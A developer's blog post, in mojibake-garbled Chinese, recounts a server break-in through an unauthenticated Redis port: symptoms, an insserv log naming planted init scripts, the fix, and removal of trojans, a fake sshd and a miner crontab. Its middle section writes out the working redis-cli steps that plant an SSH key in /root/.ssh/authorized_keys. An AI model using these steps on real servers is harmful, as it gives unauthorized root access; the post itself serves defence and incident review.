其實(shí)這個(gè)問(wèn)題在網(wǎng)上都有說(shuō)明。然而因?yàn)楸救耸情_(kāi)發(fā)出身，運(yùn)維方面比較欠缺，所以才會(huì)遇到此問(wèn)題，遂記錄下來(lái)，以此為戒。

被入侵現(xiàn)象

服務(wù)器多了很多莫名其妙的操作，根據(jù)查看操作記錄命令history得到。

服務(wù)器會(huì)莫名其妙重啟。

經(jīng)常ssh免密登錄失效。

apt-get使用報(bào)錯(cuò)。

報(bào)錯(cuò)log如下：

insserv: warning: script 'S01wipefs' missing LSB tags and overrides
insserv: warning: script 'S02acpidtd' missing LSB tags and overrides
insserv: warning: script 'S99selinux' missing LSB tags and overrides
insserv: warning: script 'S02DbSecuritySpt' missing LSB tags and overrides
insserv: warning: script 'wipefs' missing LSB tags and overrides
insserv: warning: script 'DbSecuritySpt' missing LSB tags and overrides
insserv: warning: script 'selinux' missing LSB tags and overrides
insserv: warning: script 'acpidtd' missing LSB tags and overrides
insserv: There is a loop between service plymouth and mountdevsubfs if started
insserv:  loop involving service mountdevsubfs at depth 2
insserv:  loop involving service udev at depth 1
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!

看起來(lái)很正常對(duì)不對(duì)，畢竟selinux也是常用安全服務(wù)。

被入侵原因：Redis漏洞

由于Redis可以直接直接通過(guò)IP:port 訪問(wèn)，所以如果不配置密碼，會(huì)端口大開(kāi)。在通過(guò)redis-cli修改數(shù)據(jù)持久化路徑指定到.ssh/authorized_keys，將自己的ssh公鑰持久化到服務(wù)器公鑰，就可以直接ssh登錄服務(wù)器進(jìn)行操作。在https://bbs.ichunqiu.com/thread-17634-1-1.html 一文中有詳細(xì)說(shuō)明。大致攻擊過(guò)程記錄如下：

將公鑰寫(xiě)入一個(gè)文本中：

cd ~/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> hack.txt

利用redis客戶端連接靶機(jī)redis：

cat hack.txt | /usr/local/redis-2.8.3/src/./redis-cli -h 192.168.132.134 -x set crack

獲取并修改redis備份的路徑

CONFIG SET dir /root/.ssh
CONFIG SET dbfilename authorized_keys

保存

save

至此可以直接ssh免密登錄。

補(bǔ)漏洞

其實(shí)很簡(jiǎn)單，在redis的配置文件里加上密碼驗(yàn)證即可。這樣在redis-cli里不用密碼是沒(méi)有辦法進(jìn)行操作的。

或者可以在配置文件里bind固定地址才可以訪問(wèn)Redis。

殺掉入侵程序

某些內(nèi)容要感謝https://yq.aliyun.com/ask/57692?spm=5176.8246799.0.0.iwQw3W 和https://www.cnblogs.com/liuchuyu/p/7490338.html 。

在解決問(wèn)題的時(shí)候第一步想的是apt-get為什么會(huì)因?yàn)閟elinux報(bào)錯(cuò)。在服務(wù)器上查看到有/etc/init.d/selinux這個(gè)文件的。而在我自己的Ubuntu PC上是沒(méi)有查看到/etc/init.d/selinux的文件的。遂去查看里面內(nèi)容，發(fā)現(xiàn)里面啟動(dòng)了一個(gè)進(jìn)程（劃重點(diǎn)）：/usr/bin/getty。遂去晚上查找這個(gè)進(jìn)程的用處，果不其然，是木馬進(jìn)程。遂刪除之。在網(wǎng)上看到同目錄下還有DbSecuritySpt，同樣是入侵程序。
apt-get 的報(bào)錯(cuò)還有諸如S01wipefs，S02acpidtd此類的啟動(dòng)項(xiàng)，遂從S01-S06級(jí)別的啟動(dòng)項(xiàng)全部刪除。并且檢查這些進(jìn)程當(dāng)前是否有正在運(yùn)行中的，全部kill。
同樣，在/usr/bin里的還有偽裝成ssh的程序.sshd，全部rm。
按照https://www.cnblogs.com/liuchuyu/p/7490338.html 的說(shuō)法，該入侵是將服務(wù)器變成挖礦機(jī)器。會(huì)添加crontab。遂檢查，果然有木馬的定時(shí)調(diào)度項(xiàng)，沒(méi)有任何猶豫，雙擊d解決。
此時(shí)再apt-get沒(méi)有任何報(bào)錯(cuò)，并且第二天服務(wù)器沒(méi)有任何莫名其妙的history，ssh再也沒(méi)有問(wèn)題。

結(jié)論：我本不是運(yùn)維，開(kāi)發(fā)做多了，就成了運(yùn)維。